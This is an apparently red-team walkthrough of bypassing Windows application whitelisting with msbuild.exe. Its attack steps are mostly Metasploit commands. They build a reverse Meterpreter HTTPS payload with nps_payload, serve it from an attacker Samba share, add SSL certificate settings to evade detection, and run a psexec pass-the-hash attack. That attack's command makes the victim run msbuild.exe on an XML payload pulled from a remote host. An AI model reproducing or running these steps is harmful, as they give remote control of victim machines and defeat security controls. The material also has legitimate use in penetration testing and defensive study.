Sources and many thanks to:
@subTee – Bypassing Application Whitelisting using MSBuild.exe – Device Guard Example and Mitigations
http://subt0x10.blogspot.com/2017/04/bypassing-application-whitelisting.html
@spoonman1091 & @ben0xa – NPS_Payload
https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/
Attack Video: https://youtu.be/5WQcB6L56QQ
Demo Systems:
Victim Machine – Windows 7 Professional (x86) with Norton Security AV
Attack Machine – Kali Rolling 2017.1
Attack Methodology:
1. Build the XML file for msbuild.exe using nps_payload.
This XML file will contain my PSH Reverse Meterpreter HTTPS payload.
2. Check the Samba config file, and start the smbd service.
3. Copy the XML file to the local share directory.
4. Modify the Metasploit RC file to include custom SSL cert for additional evasion.
set HandlerSSLCert /root/.msf4/loot/file.pem
set StagerVerifySSLCert true
5. Modify the Metasploit RC file to include the psexec+pth attack.
Payload windows/exec executes the msbuild.exe cmd generated from nps_payload.
use exploit/windows/smb/psexec
set rhost IPADDRESS
set smbuser Administrator
set smbpass aad3b435b51404eeaad3b435b51404ee:HASH
set payload windows/exec
set cmd cmd.exe /c start %windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe \\\\192.168.222.198\\payloads$\\msbuild_nps.xml
6. Execute the Metasploit RC file, and gain pwnage.